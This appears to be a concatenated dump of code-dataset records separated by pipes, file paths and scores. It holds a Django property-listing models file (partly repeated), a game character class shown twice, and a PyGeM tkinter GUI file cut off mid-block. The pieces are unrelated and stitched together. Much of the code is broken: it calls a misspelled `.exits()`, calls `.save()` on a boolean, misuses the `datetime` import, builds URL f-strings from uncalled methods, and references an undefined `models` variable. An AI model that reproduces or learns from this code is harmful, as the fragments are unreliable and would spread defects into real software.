property_longitude = FloatField(_("Map Longitude"), null=True, default=0.000000000, validators=[MinValueValidator(-180.000000000), MaxValueValidator(180.000000000)], help_text="You can find this on google maps by inputing the actual property address and right clicking on the location pointer to reveal the longitude")
property_location = CharField(_("Property Street Address"), max_length=500, null=True, blank=False, help_text="eg. 123 Close, Street !!! PS: Do not attach a state or country when listing this property !!!")
property_near_location = CharField(_("Property Closest building street address"), max_length=500, null=True, blank=False, help_text="eg. 123 Close, Street !!! PS: Do not attach a state or country when listing this property !!!")
property_city = ForeignKey("City", on_delete=SET_NULL, null=True, related_name="propertycity")
property_state = ForeignKey("State", on_delete=SET_NULL, null=True, related_name="propertystate")
property_detail = HTMLField()
property_age = CharField(_("Building Age (Optional)"), max_length=50, null=True, choices=PROPERTY_AGE, default=ZEROFIVE, blank=True)
property_features = ManyToManyField("PropertyFeature", help_text="Select all features that apply for the house")
property_expire = IntegerField(_("How long is the renting or buying supposed to last, 1 year or more?"), default=0*455, null=True, blank=True, help_text="use 100 if it a land that is being purchased. and any figure when it is a rentage. NOTE: An additional 2 months is given to a property before it is reactivated as availble for purchase after its last purchased date")
property_sold = BooleanField(default=False)
approved = BooleanField(default=False)
featured = BooleanField(default=False)
def total_area(self):
if self.property_area and self.property_area_number:
return self.property_area * Decimal(self.property_area_number)
def sqft_total(self):
if self.property_price and self.property_area_number:
return self.property_price * Decimal(self.property_area_number)
def last_purchased_date(self):
if self.property_sold:
return datetime.date.today()
def next_expiry_date(self):
if self.last_purchased_date and self.property_expire > 0 and self.property_expire < 100:
return self.last_purchased_date + timedelta(days=self.property_expire)
def now_availble(self):
today = datetime.date.today()
if today > self.next_expiry_date and self.property_sold:
self.property_sold = False
self.property_sold.save()
return True
return False
def formated_address(self):
return self.property_location.replace(" ", "+")
def formated_state(self):
return self.property_state.title.replace(" ", "+")
def formated_closest_address(self):
return self.property_near_location.replace(" ", "+")
def __str__(self):
return str(self.property_title)
def title(self):
return self.property_title
def get_related_property(self):
return Property.objects.filter(property_agent=self.property_agent, property_type=self.property_type, property_state=self.property_state, approved=True).exclude(property_title=self.property_title)[:4]
def get_featured_property(self):
return Property.objects.filter(property_agent=self.property_agent, property_type=self.property_type, property_state=self.property_state, approved=True, featured=True).exclude(property_title=self.property_title)[:4]
def get_related_property_by_agent(self):
return Property.objects.filter(property_agent=self.property_agent)[:10]
def get_related_property_by_state(self):
return Property.objects.filter(property_state=self.property_state)[:10]
@property
def get_image_url(self):
img = self.propertyimage.first()
if img:
return img.image.url
return None
def get_all_images(self):
return self.propertyimage.all()
def get_all_floors(self):
return self.propertyplan.all()
def get_video_url(self):
img = self.propertyvideo.first()
if img:
return img.video.url
return None
class Meta:
managed = True
verbose_name = "Property"
verbose_name_plural = "Properties"
ordering = ["-created", "property_title"]
def get_absolute_url(self):
"""Get url for blog's detail view.
Returns:
str: URL for blog detail.
"""
return reverse("property:detail", kwargs={"slug": self.slug})
def get_update_url(self):
return f"{self.get_absolute_url}/update"
def get_delete_url(self):
return f"{self.get_absolute_url}/delete"
class PropertyImage(TimeStampedModel):
property = ForeignKey("Property", on_delete=CASCADE, related_name="propertyimage")
image = ResizedImageField(size=[520, 397], quality=80, crop=['middle', 'center'], upload_to=property_images, force_format='JPEG', null=True, blank=True, help_text="image size: 520x397.")
def __str__(self):
return f"{self.property.property_title} Image"
class PropertyBlueprint(TimeStampedModel):
GROUND = "Ground Floor"
FIRST = "First Floor"
SECOND = "Second Floor"
THIRD = "Third Floor"
FOURTH = "Fourth Floor"
ALL = "All Floor Type"
PENTHOUSE = "Penthouse"
GARAGE = "Garage"
POOL_HOUSE = "Pool House"
BLUEPRINT = (
(GROUND, "Ground Floor"),
(FIRST, "First Floor"),
(SECOND, "Second Floor"),
(THIRD, "Third Floor"),
(FOURTH, "Fourth Floor"),
(ALL, "All Floor Type"),
(PENTHOUSE, "Penthouse"),
(GARAGE, "Garage"),
(POOL_HOUSE, "Pool House"),
)
property = ForeignKey("Property", on_delete=CASCADE, related_name="propertyplan")
type = CharField(_("Blueprint"), null=True, blank=False, max_length=50, choices=BLUEPRINT, default=FIRST)
image = ResizedImageField(size=[1000, 576], quality=70, crop=['middle', 'center'], upload_to=blueprint_image, force_format='JPEG', null=True, blank=True, help_text="image size: 1000x576.")
floor_area = DecimalField(_("Area Sq/Ft"), max_digits=20, decimal_places=2, default=0.00, blank=False)
floor_detail = HTMLField()
def __str__(self):
return f"{self.property.property_title} {self.type} Blueprint"
class PropertyVideo(TimeStampedModel):
property = ForeignKey("Property", on_delete=CASCADE, related_name="propertyvideo")
video = FileField(upload_to=property_video, null=True, blank=True, help_text="Your video should be 40Seconds Long, 20MB in size max")
def __str__(self):
return f"{self.property.property_title} New Video"
class PropertyCompare(TimeStampedModel):
property = ForeignKey(Property, on_delete=SET_NULL, null=True, default=1, related_name="compareproperty")
class Meta:
managed = True
verbose_name = "Property Compare"
verbose_name_plural = "Properties Compared"
ordering = ["-created"]
class PropertyBookmark(TimeStampedModel):
user = ForeignKey(User, on_delete=CASCADE, related_name="bookmarkuser")
property = ForeignKey(Property, on_delete=SET_NULL, null=True, related_name="bookmarkproperty")
active = BooleanField(default=False)
def __str__(self):
return f"{self.user.fullname} Bookmarked {self.property.property_title}"
def deleted_property(self):
obj = Property.objects.filter(approved=True, property_sold=False, property_title=self.property.property_title).exits()
if not obj:
PropertyBookmark.objects.filter(property=self.property, user=self.user).delete()
return True
return False
def sold_property(self):
obj = Property.objects.filter(approved=True, property_sold=True, property_title=self.property.property_title).exits()
if obj:
PropertyBookmark.objects.filter(property=self.property, user=self.user, active=True).update(active=False)
return True
return False
class Meta:
managed = True
verbose_name = "Property Bookmark"
verbose_name_plural = "Properties Bookmarked"
ordering = ["-created"]
class PropertySearchSaved(TimeStampedModel):
user = ForeignKey(User, on_delete=CASCADE, related_name="searchuser")
search_link = URLField(blank=True, null=True)
saved = BooleanField(default=False)
def __str__(self):
return f"{self.user.fullname} saved {self.search_link}"
class Meta:
managed = True
verbose_name = "Property Search Query"
verbose_name_plural = "Properties Search Query"
ordering = ["-created"] | afriproperty/property/models.py | from __future__ import absolute_import
# development system imports
import os
import random
import uuid
from datetime import date, datetime, timedelta
from decimal import Decimal
from django.conf import settings
from django.contrib.auth.models import AbstractUser
from django.contrib.humanize.templatetags import humanize
from django.core.exceptions import ValidationError
from django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator
from django.db.models import (
CASCADE,
SET_NULL,
BooleanField,
CharField,
DateField,
DateTimeField,
DecimalField,
EmailField,
FileField,
ForeignKey,
GenericIPAddressField,
ImageField,
IntegerField,
ManyToManyField,
OneToOneField,
PositiveIntegerField,
SlugField,
TextChoices,
TextField,
URLField,
UUIDField,
)
from django.db.models.fields import FloatField
from django.template.loader import get_template, render_to_string
from django.urls import reverse
from django.utils import timezone
from django.utils.translation import gettext_lazy as _
from django_resized import ResizedImageField
from model_utils import Choices
from model_utils.fields import StatusField
from model_utils.models import TimeStampedModel
from tinymce.models import HTMLField
User = settings.AUTH_USER_MODEL
phone_regex = RegexValidator(regex=r'^\+?1?\d{9,15}$', message="Phone number must be entered in the format: '+999999999'. Up to 15 digits allowed.")
char_regex = RegexValidator(regex=r'^[A-Za-z]*$', message="Field must be only alphabets: A-Z or a-z")
def get_filename_ext(filepath):
base_name = os.path.basename(filepath)
name, ext = os.path.splitext(base_name)
return name, ext
def property_images(instance, filename):
new_filename = random.randint(1, 3910209312)
name, ext = get_filename_ext(filename)
final_filename = "{new_filename}{ext}".format(new_filename=new_filename, ext=ext)
return "property-photo/{new_filename}/{final_filename}".format(
new_filename=new_filename, final_filename=final_filename
)
def blueprint_image(instance, filename):
new_filename = random.randint(1, 3910209312)
name, ext = get_filename_ext(filename)
final_filename = "{new_filename}{ext}".format(new_filename=new_filename, ext=ext)
return "property-blueprint/{new_filename}/{final_filename}".format(
new_filename=new_filename, final_filename=final_filename
)
def property_video(instance, filename):
new_filename = random.randint(1, 3910209312)
name, ext = get_filename_ext(filename)
final_filename = "{new_filename}{ext}".format(new_filename=new_filename, ext=ext)
return "property-video/{new_filename}/{final_filename}".format(
new_filename=new_filename, final_filename=final_filename
)
# Create your models here.
class City(TimeStampedModel):
title = CharField(max_length=30, null=True, blank=True, unique=True)
def __str__(self):
return f"{self.title}"
class Meta:
managed = True
verbose_name = "City"
verbose_name_plural = "Cities"
ordering = ["title"]
class State(TimeStampedModel):
title = CharField(max_length=30, null=True, blank=True, unique=True)
def __str__(self):
return f"{self.title}"
class Meta:
managed = True
verbose_name = "State"
verbose_name_plural = "States"
ordering = ["title"]
class PropertyFeature(TimeStampedModel):
AC = "Air Conditioning"
POOL = "Swimming Pool"
HEAT = "Central Heating"
LAUNDRY = "Laundry Room"
GYM = "Gym"
ALARM = "Alarm"
INTERNET = "Internet"
GARAGE = "Garage"
GARDEN = "Garden"
PARKING = "Parking Lot"
EXERCISE = "Exercise Room"
COOLING = "Central Cooling"
STORAGE = "Srorage Room"
WATER = "Treated Water"
PROPERTY_FEATURES = (
(AC, "Air Conditioning"),
(POOL, "Swimming Pool"),
(HEAT, "Central Heating"),
(LAUNDRY, "Laundry Room"),
(PARKING, "Parking Lot"),
(EXERCISE, "Exercise Room"),
(COOLING, "Central Cooling"),
(STORAGE, "Srorage Room"),
(WATER, "Treated Water"),
(INTERNET, "Internet"),
(GARAGE, "Attached Garage"),
(GARDEN, "Garden"),
(GYM, "Gym"),
(ALARM, "Alarm"),
)
property_features = CharField(_("Property Features (Optional)"), max_length=17, choices=PROPERTY_FEATURES, default=POOL, null=True, blank=True, unique=True)
def __str__(self):
return str(self.property_features)
class Meta:
managed = True
verbose_name = "Property Feature"
verbose_name_plural = "Property Features"
ordering = ["property_features"]
class Property(TimeStampedModel):
SOLD = "Sold"
BUY = "Buy"
RENT = "Rent"
DEVELOP = "Develop"
SHORTLET = "Shortlet"
PROPERTY_STATUS = (
(SOLD, "Sold"),
(BUY, "Buy"),
(RENT, "Rent"),
(DEVELOP, "Develop"),
(SHORTLET, "Shortlet"),
)
APARTMENT = "Apartment"
HOUSE = "House"
COMMERCIAL = "Commercial"
GARAGE = "Garage"
GARDEN = "Garden"
LOT = "Lot"
PLOT = "Plot"
PROPERTY_TYPE = (
(APARTMENT, "Apartment"),
(HOUSE, "House"),
(COMMERCIAL, "Commercial"),
(GARAGE, "Garage"),
(GARDEN, "Garden"),
(LOT, "Lot"),
(PLOT, "Plot"),
)
ONE = 1
TWO = 2
THREE = 3
FOUR = 4
FIVE = 5
SIX = 00
ROOMS = (
(ONE, "1 Room"),
(TWO, "2 Rooms"),
(THREE, "3 Rooms"),
(FOUR, "4 Rooms"),
(FIVE, "5 Rooms"),
(SIX, "More than 5 Rooms"),
)
ANNUAL = "Annually"
MONTHLY = "Monthly"
SQFT = "Sq/Ft"
PRICE_TYPE = (
(ANNUAL , "Annually"),
(MONTHLY , "Monthly"),
(SQFT , "Sq/Ft"),
)
ZEROONE = "0 - 1"
ZEROFIVE = "0 - 5"
ZEROTEN = "0 - 10"
ZEROTWENTY = "0 - 20"
ZEROFIFTY = "0 - 50"
FITYPLUS = "50 - more"
PROPERTY_AGE = (
(ZEROONE, "0 - 1"),
(ZEROFIVE, "0 - 5"),
(ZEROTEN, "0 - 10"),
(ZEROTWENTY, "0 - 20"),
(ZEROFIFTY, "0 - 50"),
(FITYPLUS, "50 - more"),
)
property_agent = ForeignKey(User, on_delete=CASCADE, related_name="agentproperty")
property_title = CharField(_("Property Title"), null=True, blank=False, max_length=500)
slug = SlugField(max_length=700, blank=True, null=True, unique=True)
property_status = CharField(_("Property Status"), max_length=8, choices=PROPERTY_STATUS, default=RENT, null=True, blank=True)
property_type = CharField(_("Property Type"), max_length=15, choices=PROPERTY_TYPE, default=APARTMENT, null=True, blank=True)
property_price_type = CharField(_("Property Price Type"), max_length=15, choices=PRICE_TYPE, default=ANNUAL, null=True, blank=False)
property_price = DecimalField(_("Property Price (for 1 year or 1 sq/ft)"), max_digits=20, decimal_places=2, default=0.00, blank=False, help_text="if your price type is sq/ft, then the price cost should be by a unit of the property area square feet and leave the total we will automatically round it up for you by the total area numbers you have ")
property_area = DecimalField(_("Per Sq/Ft"), max_digits=20, decimal_places=2, default=0.00, blank=True)
property_area_number = IntegerField(_("How many sq/ft do you have of the above property per sq/ft? i.e (5 Per Sq/Ft x 10 = 50 Total Square Feet) leave it empty for rented properties"), default=1, null=True, blank=True, help_text="From 1-1000. to calculate to total price for square feets")
property_bathrooms = IntegerField(_("Bath Rooms"), choices=ROOMS, default=ONE, null=True, blank=False)
property_bedrooms = IntegerField(_("Bed Rooms"), choices=ROOMS, default=ONE, null=True, blank=False)
property_parlors = IntegerField(_("Parlors"), choices=ROOMS, default=ONE, null=True, blank=False)
property_latitude = FloatField(_("Map Latitude"), null=True, default=0.000000000, validators=[MinValueValidator(-90.000000000), MaxValueValidator(90.000000000)], help_text="You can find this on google maps by inputing the actual property address and right clicking on the location pointer to reveal the latitude")
property_longitude = FloatField(_("Map Longitude"), null=True, default=0.000000000, validators=[MinValueValidator(-180.000000000), MaxValueValidator(180.000000000)], help_text="You can find this on google maps by inputing the actual property address and right clicking on the location pointer to reveal the longitude")
property_location = CharField(_("Property Street Address"), max_length=500, null=True, blank=False, help_text="eg. 123 Close, Street !!! PS: Do not attach a state or country when listing this property !!!")
property_near_location = CharField(_("Property Closest building street address"), max_length=500, null=True, blank=False, help_text="eg. 123 Close, Street !!! PS: Do not attach a state or country when listing this property !!!")
property_city = ForeignKey("City", on_delete=SET_NULL, null=True, related_name="propertycity")
property_state = ForeignKey("State", on_delete=SET_NULL, null=True, related_name="propertystate")
property_detail = HTMLField()
property_age = CharField(_("Building Age (Optional)"), max_length=50, null=True, choices=PROPERTY_AGE, default=ZEROFIVE, blank=True)
property_features = ManyToManyField("PropertyFeature", help_text="Select all features that apply for the house")
property_expire = IntegerField(_("How long is the renting or buying supposed to last, 1 year or more?"), default=0*455, null=True, blank=True, help_text="use 100 if it a land that is being purchased. and any figure when it is a rentage. NOTE: An additional 2 months is given to a property before it is reactivated as availble for purchase after its last purchased date")
property_sold = BooleanField(default=False)
approved = BooleanField(default=False)
featured = BooleanField(default=False)
def total_area(self):
if self.property_area and self.property_area_number:
return self.property_area * Decimal(self.property_area_number)
def sqft_total(self):
if self.property_price and self.property_area_number:
return self.property_price * Decimal(self.property_area_number)
def last_purchased_date(self):
if self.property_sold:
return datetime.date.today()
def next_expiry_date(self):
if self.last_purchased_date and self.property_expire > 0 and self.property_expire < 100:
return self.last_purchased_date + timedelta(days=self.property_expire)
def now_availble(self):
today = datetime.date.today()
if today > self.next_expiry_date and self.property_sold:
self.property_sold = False
self.property_sold.save()
return True
return False
def formated_address(self):
return self.property_location.replace(" ", "+")
def formated_state(self):
return self.property_state.title.replace(" ", "+")
def formated_closest_address(self):
return self.property_near_location.replace(" ", "+")
def __str__(self):
return str(self.property_title)
def title(self):
return self.property_title
def get_related_property(self):
return Property.objects.filter(property_agent=self.property_agent, property_type=self.property_type, property_state=self.property_state, approved=True).exclude(property_title=self.property_title)[:4]
def get_featured_property(self):
return Property.objects.filter(property_agent=self.property_agent, property_type=self.property_type, property_state=self.property_state, approved=True, featured=True).exclude(property_title=self.property_title)[:4]
def get_related_property_by_agent(self):
return Property.objects.filter(property_agent=self.property_agent)[:10]
def get_related_property_by_state(self):
return Property.objects.filter(property_state=self.property_state)[:10]
@property
def get_image_url(self):
img = self.propertyimage.first()
if img:
return img.image.url
return None
def get_all_images(self):
return self.propertyimage.all()
def get_all_floors(self):
return self.propertyplan.all()
def get_video_url(self):
img = self.propertyvideo.first()
if img:
return img.video.url
return None
class Meta:
managed = True
verbose_name = "Property"
verbose_name_plural = "Properties"
ordering = ["-created", "property_title"]
def get_absolute_url(self):
"""Get url for blog's detail view.
Returns:
str: URL for blog detail.
"""
return reverse("property:detail", kwargs={"slug": self.slug})
def get_update_url(self):
return f"{self.get_absolute_url}/update"
def get_delete_url(self):
return f"{self.get_absolute_url}/delete"
class PropertyImage(TimeStampedModel):
property = ForeignKey("Property", on_delete=CASCADE, related_name="propertyimage")
image = ResizedImageField(size=[520, 397], quality=80, crop=['middle', 'center'], upload_to=property_images, force_format='JPEG', null=True, blank=True, help_text="image size: 520x397.")
def __str__(self):
return f"{self.property.property_title} Image"
class PropertyBlueprint(TimeStampedModel):
GROUND = "Ground Floor"
FIRST = "First Floor"
SECOND = "Second Floor"
THIRD = "Third Floor"
FOURTH = "Fourth Floor"
ALL = "All Floor Type"
PENTHOUSE = "Penthouse"
GARAGE = "Garage"
POOL_HOUSE = "Pool House"
BLUEPRINT = (
(GROUND, "Ground Floor"),
(FIRST, "First Floor"),
(SECOND, "Second Floor"),
(THIRD, "Third Floor"),
(FOURTH, "Fourth Floor"),
(ALL, "All Floor Type"),
(PENTHOUSE, "Penthouse"),
(GARAGE, "Garage"),
(POOL_HOUSE, "Pool House"),
)
property = ForeignKey("Property", on_delete=CASCADE, related_name="propertyplan")
type = CharField(_("Blueprint"), null=True, blank=False, max_length=50, choices=BLUEPRINT, default=FIRST)
image = ResizedImageField(size=[1000, 576], quality=70, crop=['middle', 'center'], upload_to=blueprint_image, force_format='JPEG', null=True, blank=True, help_text="image size: 1000x576.")
floor_area = DecimalField(_("Area Sq/Ft"), max_digits=20, decimal_places=2, default=0.00, blank=False)
floor_detail = HTMLField()
def __str__(self):
return f"{self.property.property_title} {self.type} Blueprint"
class PropertyVideo(TimeStampedModel):
property = ForeignKey("Property", on_delete=CASCADE, related_name="propertyvideo")
video = FileField(upload_to=property_video, null=True, blank=True, help_text="Your video should be 40Seconds Long, 20MB in size max")
def __str__(self):
return f"{self.property.property_title} New Video"
class PropertyCompare(TimeStampedModel):
property = ForeignKey(Property, on_delete=SET_NULL, null=True, default=1, related_name="compareproperty")
class Meta:
managed = True
verbose_name = "Property Compare"
verbose_name_plural = "Properties Compared"
ordering = ["-created"]
class PropertyBookmark(TimeStampedModel):
user = ForeignKey(User, on_delete=CASCADE, related_name="bookmarkuser")
property = ForeignKey(Property, on_delete=SET_NULL, null=True, related_name="bookmarkproperty")
active = BooleanField(default=False)
def __str__(self):
return f"{self.user.fullname} Bookmarked {self.property.property_title}"
def deleted_property(self):
obj = Property.objects.filter(approved=True, property_sold=False, property_title=self.property.property_title).exits()
if not obj:
PropertyBookmark.objects.filter(property=self.property, user=self.user).delete()
return True
return False
def sold_property(self):
obj = Property.objects.filter(approved=True, property_sold=True, property_title=self.property.property_title).exits()
if obj:
PropertyBookmark.objects.filter(property=self.property, user=self.user, active=True).update(active=False)
return True
return False
class Meta:
managed = True
verbose_name = "Property Bookmark"
verbose_name_plural = "Properties Bookmarked"
ordering = ["-created"]
class PropertySearchSaved(TimeStampedModel):
user = ForeignKey(User, on_delete=CASCADE, related_name="searchuser")
search_link = URLField(blank=True, null=True)
saved = BooleanField(default=False)
def __str__(self):
return f"{self.user.fullname} saved {self.search_link}"
class Meta:
managed = True
verbose_name = "Property Search Query"
verbose_name_plural = "Properties Search Query"
ordering = ["-created"] | 0.499512 | 0.101545 |
from culture import Culture
import random
class Character():
def __init__(self, models, culture, residence, age):
self.culture = culture
self.models = models
self.place = residence
# Fullname will later always be set to highest title
self.age = age
self.state = "alive" # alive or dead
self.titles = []
g = random.randint(0,1)
if g == 0:
self.gender = "m"
self.firstname = culture.generate_name(models, "m")
else:
self.gender = "f"
self.firstname = culture.generate_name(models, "f")
self.fullname = ""
self.refresh_fullname()
self.skills = {
"Diplomacy":0,
"Military":0,
"Commerce":0,
"Intrigue":0,
"Scholarship":0
}
self.competence = 0
self.assign_skillpoints()
self.focus = []
self.setfocus()
def refresh_fullname(self):
highest_title = self.get_highest_title()
self.fullname = "{} {}".format(highest_title, self.firstname)
def assign_skillpoints(self):
free_points = 0
for i in range(4):
free_points += random.randint(1,6)
self.competence = free_points
for i in range(free_points):
while True:
r = random.randint(1,5)
if r == 1 and self.skills["Diplomacy"] < 5:
self.skills["Diplomacy"] += 1
break
elif r == 2 and self.skills["Military"] < 5:
self.skills["Military"] += 1
break
elif r == 3 and self.skills["Commerce"] < 5:
self.skills["Commerce"] += 1
break
elif r == 4 and self.skills["Intrigue"] < 5:
self.skills["Intrigue"] += 1
break
elif r == 5 and self.skills["Scholarship"] < 5:
self.skills["Scholarship"] += 1
break
def setfocus(self):
""" Returns a list of the highest skills."""
highest = [k for k,v in self.skills.items() if v == max(self.skills.values())]
self.focus = highest
def get_highest_title(self):
if len(self.titles) > 0:
titles_levels = []
for t in self.titles:
titles_levels.append((t, t.level))
h_title = sorted(titles_levels, key=lambda x: x[1], reverse=True)[0][0]
if self.gender == "m":
return h_title.getMTitle()
else:
return h_title.getFTitle()
else:
if self.gender == "m":
return "Sir"
else:
return "Lady"
def _age(self):
self.age += 1
if self.age > 50: # Age 100 100% dead, 50 0.1 % dead chance
chance_to_die = (self.age - 50)*0.2
m = random.randint(1,100)
if m <= chance_to_die:
self.die()
def die(self):
# Lose title if has any and distribute them to successors
# Standard succession type is Gavelkind => depending on Culture
# Next line is only a placeholder until a proper system is implemented
successor = Character(models, self.culture, self.place, random.randint(30,60))
self.state = "dead" | characters.py |
from culture import Culture
import random
class Character():
def __init__(self, models, culture, residence, age):
self.culture = culture
self.models = models
self.place = residence
# Fullname will later always be set to highest title
self.age = age
self.state = "alive" # alive or dead
self.titles = []
g = random.randint(0,1)
if g == 0:
self.gender = "m"
self.firstname = culture.generate_name(models, "m")
else:
self.gender = "f"
self.firstname = culture.generate_name(models, "f")
self.fullname = ""
self.refresh_fullname()
self.skills = {
"Diplomacy":0,
"Military":0,
"Commerce":0,
"Intrigue":0,
"Scholarship":0
}
self.competence = 0
self.assign_skillpoints()
self.focus = []
self.setfocus()
def refresh_fullname(self):
highest_title = self.get_highest_title()
self.fullname = "{} {}".format(highest_title, self.firstname)
def assign_skillpoints(self):
free_points = 0
for i in range(4):
free_points += random.randint(1,6)
self.competence = free_points
for i in range(free_points):
while True:
r = random.randint(1,5)
if r == 1 and self.skills["Diplomacy"] < 5:
self.skills["Diplomacy"] += 1
break
elif r == 2 and self.skills["Military"] < 5:
self.skills["Military"] += 1
break
elif r == 3 and self.skills["Commerce"] < 5:
self.skills["Commerce"] += 1
break
elif r == 4 and self.skills["Intrigue"] < 5:
self.skills["Intrigue"] += 1
break
elif r == 5 and self.skills["Scholarship"] < 5:
self.skills["Scholarship"] += 1
break
def setfocus(self):
""" Returns a list of the highest skills."""
highest = [k for k,v in self.skills.items() if v == max(self.skills.values())]
self.focus = highest
def get_highest_title(self):
if len(self.titles) > 0:
titles_levels = []
for t in self.titles:
titles_levels.append((t, t.level))
h_title = sorted(titles_levels, key=lambda x: x[1], reverse=True)[0][0]
if self.gender == "m":
return h_title.getMTitle()
else:
return h_title.getFTitle()
else:
if self.gender == "m":
return "Sir"
else:
return "Lady"
def _age(self):
self.age += 1
if self.age > 50: # Age 100 100% dead, 50 0.1 % dead chance
chance_to_die = (self.age - 50)*0.2
m = random.randint(1,100)
if m <= chance_to_die:
self.die()
def die(self):
# Lose title if has any and distribute them to successors
# Standard succession type is Gavelkind => depending on Culture
# Next line is only a placeholder until a proper system is implemented
successor = Character(models, self.culture, self.place, random.randint(30,60))
self.state = "dead" | 0.35869 | 0.168207 |
try:
import tkinter
from tkinter.filedialog import askopenfilename
except ImportError:
import Tkinter as tkinter
from tkFileDialog import askopenfilename
import os
import webbrowser
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
class Gui(object):
    """
    The class for the Graphic Unit Interface.

    :cvar string filename_geometry: input geometry to be morphed.
    :cvar string filename_parameters: input parameters file for FFD.
    :cvar int check_var_dump_orig: dump or not the original FFD lattice.
    :cvar int check_var_dump_morphed: dump or not the morphed FFD lattice.
    :cvar string outfilename: name of the output file geometry.
        The extension of the file is set automatically equal to the one
        of the input file 'filename_geometry'.
    :cvar string outfilename_lattice_orig: name of the dumped file
        for the original lattice.
        The extension of the file is set automatically equal to '.vtk'.
    :cvar string outfilename_lattice_mod: name of the dumped file
        for the morphed lattice.
        The extension of the file is set automatically equal to '.vtk'.
    :cvar tkinter.Tk root: main window object of the GUI.
    :cvar string print_geometry_path: geometry path to be printed close to the
        'pick geometry' button.
    :cvar string print_parameter_path: parameters file path to be printed
        close to the 'pick parameters' button.
    :cvar tkinter.Label label_geo: label related to 'print_geometry_path'.
    :cvar tkinter.Label label_params: label related to 'print_parameters_path'.
    :cvar string url: url of the github page of PyGeM.
    :cvar tkinter.Canvas logo_panel: canvas for PyGeM logo.
    :cvar tkinter.PhotoImage img: PyGeM logo.
    :cvar tkinter.Frame orig_geo_frame: frame for plotting of the
        original geometry.
    :cvar tkinter.Frame mod_geo_frame: frame for plotting of the final geometry.
    """

    def __init__(self):
        # Fixed-size main window: the three side-by-side frames are laid out
        # for exactly 1400x400.
        self.root = tkinter.Tk()
        self.root.resizable(width=False, height=False)
        self.root.minsize(width=1400, height=400)
        self.root.maxsize(width=1400, height=400)
        self.root.title('PyGeM')
        # NOTE(review): these two StringVars are later rebound to plain
        # strings by _chose_geometry/_chose_parameters; the rest of the
        # class treats them as strings.
        self.filename_geometry = tkinter.StringVar()
        self.filename_parameters = tkinter.StringVar()
        self.check_var_dump_orig = tkinter.IntVar()
        self.check_var_dump_morphed = tkinter.IntVar()
        self.outfilename = tkinter.StringVar()
        self.outfilename_lattice_orig = tkinter.StringVar()
        self.outfilename_lattice_mod = tkinter.StringVar()
        self.print_geometry_path = tkinter.StringVar()
        self.print_parameter_path = tkinter.StringVar()
        # Widgets below are created lazily in _main().
        self.label_geo = None
        self.label_params = None
        self.url = 'https://github.com/mathLab/PyGeM'
        self.logo_panel = None
        self.img = None
        self.orig_geo_frame = None
        self.mod_geo_frame = None

    def _chose_geometry(self):
        """
        The private method explores the file system and allows to select the
        wanted geometry.

        Up to now, you can select only IGES, OpenFOAM, STL, UNV, VTK or STEP
        geometry files.
        """
        # BUGFIX: the original list read
        #   ('STEP File', ('*.step, *.stp')) ('All', '*')
        # i.e. a missing comma turned the STEP tuple into a *call* of the
        # following tuple (TypeError at runtime), and the pattern was one
        # string instead of two. Both are corrected here.
        self.filename_geometry = \
            askopenfilename(filetypes=[("IGES File", ('*.iges', '*.igs')),
                                       ("OpenFOAM File", '*'),
                                       ('STL File', '*.stl'),
                                       ('UNV File', '*.unv'),
                                       ('VTK File', '*.vtk'),
                                       ('STEP File', ('*.step', '*.stp')),
                                       ('All', '*')])
        self.print_geometry_path.set(self.filename_geometry)
        # Green label signals that a geometry has been picked.
        self.label_geo.configure(fg='green')

    def _chose_parameters(self):
        """
        The private method explores the file system and allows to select the
        wanted parameters file.

        It visualizes only .prm files.
        """
        self.filename_parameters = askopenfilename(
            filetypes=[("Params File", "*.prm")])
        self.print_parameter_path.set(self.filename_parameters)
        # Green label signals that a parameters file has been picked.
        self.label_params.configure(fg='green')

    def _run_simulation(self):
        """
        The private method runs the geometrical morphing.

        It parses the selected geometry, applies the FFD defined by the
        selected parameters file, writes out the morphed geometry (and,
        optionally, the original/morphed lattices as '.vtk') and, for the
        formats that support it, plots input and output geometries in the
        side frames.

        :raises NotImplementedError: if the geometry file extension is not
            handled by any of the available handlers.
        """
        # Imported locally so that the GUI can be opened even if the heavy
        # pygem dependencies are not needed yet.
        import pygem as pg

        params = pg.params.FFDParameters()
        params.read_parameters(filename=self.filename_parameters)

        # Dispatch on the input extension; an empty extension is assumed to
        # be an OpenFOAM case.
        file_extension_in = os.path.splitext(self.filename_geometry)[-1]
        ext_handlers = {'.stl': pg.stlhandler.StlHandler(),
                        '.iges': pg.igeshandler.IgesHandler(),
                        '.igs': pg.igeshandler.IgesHandler(),
                        '.unv': pg.unvhandler.UnvHandler(),
                        '': pg.openfhandler.OpenFoamHandler(),
                        '.vtk': pg.vtkhandler.VtkHandler(),
                        '.stp': pg.stephandler.StepHandler(),
                        '.step': pg.stephandler.StepHandler()}
        if file_extension_in in ext_handlers:
            geo_handler = ext_handlers[file_extension_in]
        else:
            raise NotImplementedError("Format not implemented yet.")

        mesh_points = geo_handler.parse(self.filename_geometry)
        free_form = pg.freeform.FFD(params, mesh_points)
        free_form.perform()
        new_mesh_points = free_form.modified_mesh_points
        # Output keeps the same extension as the input geometry.
        geo_handler.write(new_mesh_points,
                          self.outfilename.get() + file_extension_in)

        if self.check_var_dump_orig.get() == 1:
            pg.utils.write_bounding_box(
                params, self.outfilename_lattice_orig.get() + '.vtk', False)
        if self.check_var_dump_morphed.get() == 1:
            pg.utils.write_bounding_box(
                params, self.outfilename_lattice_mod.get() + '.vtk', True)

        # Only these handlers provide a matplotlib plot() method.
        if file_extension_in in ['.vtk', '.stl', '.iges', '.igs']:
            figure_in = geo_handler.plot()
            figure_in.set_size_inches(4, 3)
            FigureCanvasTkAgg(figure_in, master=self.orig_geo_frame).\
                get_tk_widget().grid(row=1, column=0, padx=5, pady=5)
            figure_out = geo_handler.plot(
                self.outfilename.get() + file_extension_in)
            figure_out.set_size_inches(4, 3)
            FigureCanvasTkAgg(figure_out, master=self.mod_geo_frame).\
                get_tk_widget().grid(row=1, column=0, padx=5, pady=5)

    def _goto_website(self):
        """
        The private method opens the PyGeM main page on github.

        It is used for info about PyGeM in the menu.
        """
        webbrowser.open(self.url)

    def _main(self):
        """
        The private method initializes and visualizes the window.
        """
        self.logo_panel = tkinter.Canvas(self.root, height=60, width=60)
        self.logo_panel.pack(side="bottom", padx=5, pady=5, anchor=tkinter.SE)
        # The logo path depends on the working directory: try the repository
        # root first, then one level up (e.g. when launched from pygem/).
        # tkinter raises TclError when the image file cannot be opened.
        try:
            self.img = tkinter.PhotoImage(master=self.logo_panel,
                                          file='readme/logo_PyGeM_gui.gif')
        except tkinter.TclError:
